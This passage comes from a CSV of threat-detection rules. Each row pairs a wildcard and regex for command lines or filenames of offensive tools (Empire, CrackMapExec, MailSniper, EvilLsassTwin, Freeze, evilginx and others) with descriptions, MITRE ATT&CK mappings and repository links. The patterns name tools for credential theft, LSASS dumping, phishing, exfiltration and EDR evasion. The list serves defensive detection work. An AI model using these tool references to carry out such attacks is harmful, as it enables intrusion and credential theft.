- T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Persistence.psm1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* emailall.py*",".{0,1000}\semailall\.py.{0,1000}","offensive_tool_keyword","EmailAll","EmailAll is a powerful Email Collect tool","T1114.001 - T1113 - T1087.003","TA0009 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Taonn/EmailAll","1","0","N/A","6","7","627","110","2022-03-04T10:36:41Z","2022-02-14T06:55:30Z" "* empire.arguments*",".{0,1000}\sempire\.arguments.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "* empire.client.*",".{0,1000}\sempire\.client\..{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "* empire.py*",".{0,1000}\sempire\.py.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "* empire_exec*",".{0,1000}\sempire_exec.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "* empireadmin*",".{0,1000}\sempireadmin.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "* enable_all_tokens.exe*",".{0,1000}\senable_all_tokens\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "* EnableAllTokenPrivs.exe*",".{0,1000}\sEnableAllTokenPrivs\.exe.{0,1000}","offensive_tool_keyword","EnableAllTokenPrivs","Enable or Disable TokenPrivilege(s)","T1134 - T1055","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/xvt-void/EnableAllTokenPrivs","1","0","N/A","7","1","11","3","2024-02-18T20:55:05Z","2024-02-17T15:39:25Z" "* EnableAllTokenPrivs.ps1*",".{0,1000}\sEnableAllTokenPrivs\.ps1.{0,1000}","offensive_tool_keyword","EnableAllTokenPrivs","Enable or Disable TokenPrivilege(s)","T1134 - T1055","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/xvt-void/EnableAllTokenPrivs","1","0","N/A","7","1","11","3","2024-02-18T20:55:05Z","2024-02-17T15:39:25Z" "* -enabled -u * -p * -old-bloodhound*",".{0,1000}\s\-enabled\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-old\-bloodhound.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "* -encrypt * -process * -sandbox *",".{0,1000}\s\-encrypt\s.{0,1000}\s\-process\s.{0,1000}\s\-sandbox\s.{0,1000}","offensive_tool_keyword","Freeze","Freeze is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls. and alternative execution methods","T1055 - T1055.001 - T1055.003 - T1055.004 - T1055.005 - T1055.006 - T1055.007 - T1055.008 - T1055.012 - T1055.013 - T1055.014 - T1055.015 - T1055.016 - T1055.017 - T1055.018 - T1055.019 - T1055.020 - T1055.021 - T1055.022 - T1055.023 - T1055.024 - T1055.025 - T1112","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/Freeze","1","0","N/A","N/A","10","1378","171","2023-08-18T17:25:07Z","2022-09-21T14:40:59Z" "* encryption_aes.exe*",".{0,1000}\sencryption_aes\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "* encryption_rc4.exe*",".{0,1000}\sencryption_rc4\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "* enip-info.nse*",".{0,1000}\senip\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* enum 127.0.0.1 *",".{0,1000}\senum\s127\.0\.0\.1\s.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","773","101","2024-04-20T20:46:48Z","2019-11-04T11:37:38Z" "* enum -passive -d *",".{0,1000}\senum\s\-passive\s\-d\s.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","84","11","2024-03-01T11:51:24Z","2021-11-15T13:40:56Z" "* --enum --validate-msol *",".{0,1000}\s\-\-enum\s\-\-validate\-msol\s.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","10","10","965","105","2023-11-08T17:41:59Z","2022-06-28T00:00:28Z" "* --enum --validate-teams*",".{0,1000}\s\-\-enum\s\-\-validate\-teams.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","10","10","965","105","2023-11-08T17:41:59Z","2022-06-28T00:00:28Z" "* enum_avproducts*",".{0,1000}\senum_avproducts.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "* enum_chrome*",".{0,1000}\senum_chrome.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "* enum_dns*",".{0,1000}\senum_dns.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "* EnumBrowsers.ps1*",".{0,1000}\sEnumBrowsers\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "* -Enumerate * -Module *",".{0,1000}\s\-Enumerate\s.{0,1000}\s\-Module\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* enumeration_process.exe*",".{0,1000}\senumeration_process\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "* --enum-local-admins*",".{0,1000}\s\-\-enum\-local\-admins.{0,1000}","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dirkjanm/krbrelayx","1","0","N/A","N/A","10","1013","157","2023-12-21T08:48:34Z","2019-01-08T18:42:07Z" "* epmd-info.nse*",".{0,1000}\sepmd\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* eppc-enum-processes.nse*",".{0,1000}\seppc\-enum\-processes\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* EternalHushCore *",".{0,1000}\sEternalHushCore\s.{0,1000}","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/APT64/EternalHushFramework","1","0","N/A","10","10","3","0","2023-10-28T13:08:06Z","2023-07-09T09:13:21Z" "* etumbot.py*",".{0,1000}\setumbot\.py.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "* EtwHash*",".{0,1000}\sEtwHash.{0,1000}","offensive_tool_keyword","ETWHash","C# POC to extract NetNTLMv1/v2 hashes from ETW provider","T1556.001","TA0009 ","N/A","N/A","Credential Access","https://github.com/nettitude/ETWHash","1","0","N/A","N/A","3","244","29","2023-05-10T06:45:06Z","2023-04-26T15:53:01Z" "* etwunhook.cpp*",".{0,1000}\setwunhook\.cpp.{0,1000}","offensive_tool_keyword","etwunhook","Simple ETW unhook PoC. Overwrites NtTraceEvent opcode to disable ETW at Nt-function level.","T1055 - T1562.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Meowmycks/etwunhook","1","0","N/A","9","1","39","8","2024-02-29T10:07:52Z","2024-01-22T22:21:09Z" "* etwunhook.exe*",".{0,1000}\setwunhook\.exe.{0,1000}","offensive_tool_keyword","etwunhook","Simple ETW unhook PoC. Overwrites NtTraceEvent opcode to disable ETW at Nt-function level.","T1055 - T1562.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Meowmycks/etwunhook","1","0","N/A","9","1","39","8","2024-02-29T10:07:52Z","2024-01-22T22:21:09Z" "* -eval *caplets.update* ui.update*",".{0,1000}\s\-eval\s.{0,1000}caplets\.update.{0,1000}\sui\.update.{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","0","N/A","N/A","10","15702","1412","2024-04-08T07:48:24Z","2018-01-07T15:30:41Z" "* EventViewer-UACBypass*",".{0,1000}\sEventViewer\-UACBypass.{0,1000}","offensive_tool_keyword","EventViewer-UACBypass","RCE through Unsafe .Net Deserialization in Windows Event Viewer which leads to UAC bypass","T1078.004 - T1216 - T1068","TA0004 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CsEnox/EventViewer-UACBypass","1","0","N/A","10","2","157","22","2022-04-29T09:42:37Z","2022-04-27T12:56:59Z" "* evil.corp *",".{0,1000}\sevil\.corp\s.{0,1000}","offensive_tool_keyword","spoolsploit","A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.","T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/BeetleChunks/SpoolSploit","1","0","N/A","N/A","6","545","93","2021-07-16T04:49:43Z","2021-07-07T00:32:28Z" "* EvilClippyManager*",".{0,1000}\sEvilClippyManager.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "* evilginx*",".{0,1000}\sevilginx.{0,1000}","offensive_tool_keyword","gophish","Combination of evilginx2 and GoPhish","T1565-002 - T1565-003 - T1565-012 - T1110 - T1056-001 - T1113","TA0002 - TA0003","N/A","N/A","Credential Access - Collection","https://github.com/fin3ss3g0d/evilgophish","1","0","N/A","N/A","10","1475","287","2024-05-01T19:00:30Z","2022-09-07T02:47:43Z" "* EvilnoVNC*",".{0,1000}\sEvilnoVNC.{0,1000}","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1110 - T1555 - T1204 - T1592","TA0001 - TA0006 - TA0009","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","0","N/A","9","8","717","126","2024-03-21T10:05:50Z","2022-09-04T10:48:49Z" "* evil-proxy*",".{0,1000}\sevil\-proxy.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","0","N/A","9","2","161","78","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z" "* evil-proxy.rb*",".{0,1000}\sevil\-proxy\.rb.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","0","N/A","9","2","161","78","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z" "* evilrdp.gui *",".{0,1000}\sevilrdp\.gui\s.{0,1000}","offensive_tool_keyword","evilrdp","Th evil twin of aardwolfgui using the aardwolf RDP client library that gives you extended control over the target and additional scripting capabilities from the command line.","T1021.001 - T1056.001 - T1113 - T1078.002 - T1105 - T1090.002 - T1059.001","TA0008 - TA0002 - TA0005 - TA0001 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/skelsec/evilrdp","1","0","N/A","10","10","267","30","2023-12-09T17:10:52Z","2023-11-29T13:44:58Z" "* EvilTwinServer *",".{0,1000}\sEvilTwinServer\s.{0,1000}","offensive_tool_keyword","EvilLsassTwin","attempt to duplicate open handles to LSASS. If this fails it will obtain a handle to LSASS through the NtGetNextProcess function instead of OpenProcess/NtOpenProcess.","T1003.001 - T1055 - T1093","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access - Defense Evasion","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","0","N/A","9","2","129","15","2024-04-19T15:15:35Z","2022-09-13T12:42:13Z" "* -ExchHostname * -Password *",".{0,1000}\s\-ExchHostname\s.{0,1000}\s\-Password\s.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","0","N/A","N/A","10","2810","550","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" "* --excludedcs*",".{0,1000}\s\-\-excludedcs.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","7","609","135","2024-04-30T13:43:35Z","2021-07-12T17:07:04Z" "* exclusion.c /Fodefender.o*",".{0,1000}\sexclusion\.c\s\/Fodefender\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of CobaltStrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/pwn1sher/CS-BOFs","1","0","N/A","10","10","99","22","2022-02-14T09:47:30Z","2021-01-18T08:54:48Z" "* -ExeArguments *",".{0,1000}\s\-ExeArguments\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* exec * -p * -c *",".{0,1000}\sexec\s.{0,1000}\s\-p\s.{0,1000}\s\-c\s.{0,1000}","offensive_tool_keyword","impersonate-rs","Reimplementation of Defte 